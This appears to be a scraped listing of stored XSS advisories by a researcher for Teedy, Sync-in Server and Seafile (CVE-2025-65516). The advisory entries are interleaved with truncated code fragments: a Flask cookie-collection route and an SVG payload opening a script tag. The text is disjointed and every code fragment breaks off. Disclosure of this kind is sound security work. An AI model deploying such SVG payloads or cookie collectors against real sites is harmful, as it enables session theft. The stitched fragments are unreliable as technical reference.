Teedy Stored XSS Vulnerability

Vulnerability: Stored Cross-Site Scripting (XSS) in Teedy
Affected Versions: 1.11 (latest)
Fixed Version: None (unpatched)
Reported Date: 12/07/2025
Researcher: x0root

Technical Details
Sync-in Stored XSS Vulnerability

Vulnerability: Stored Cross-Site Scripting (XSS) in Sync-in Server
Affected Versions: < 1.9.3
Fixed Version: 1.9.3
Reported Date: 12/06/2025
Researcher: x0root

Technical Details
from flask import Flask, request, jsonify

app = Flask(__name__)

@app.route("/cookie-test", methods=["GET", "POST"])
def cookie_test():
    found = []
    # 1. Normal HTTP cookies (Cookie header parsed by Flask)
    if request.cookies:
from IPython.display import HTML, display

svg_payload = """
<svg xmlns="http://www.w3.org/2000/svg" width="500" height="200">
  <rect width="100%" height="100%" fill="black"/>
  <text x="20" y="40" fill="lime" font-size="16">
    SVG XSS via IPython
  </text>
  <script>
from flask import Flask, make_response

app = Flask(__name__)

@app.route("/")
def index():
    html = """
    <!DOCTYPE html>
    <html>
    <head>
CVE-2025-65516 — Seafile Stored XSS

[Suggested Description]:
A stored cross-site scripting (XSS) vulnerability exists in Seafile Community Edition when using the Golang file server. A crafted SVG file containing malicious JavaScript can be uploaded and accessed through a public sharing link, resulting in script execution in the victim's browser.

[Vulnerability Type]: Cross Site Scripting (XSS)

[Affected Versions]:
Seafile Community Edition — all versions below 13.0.12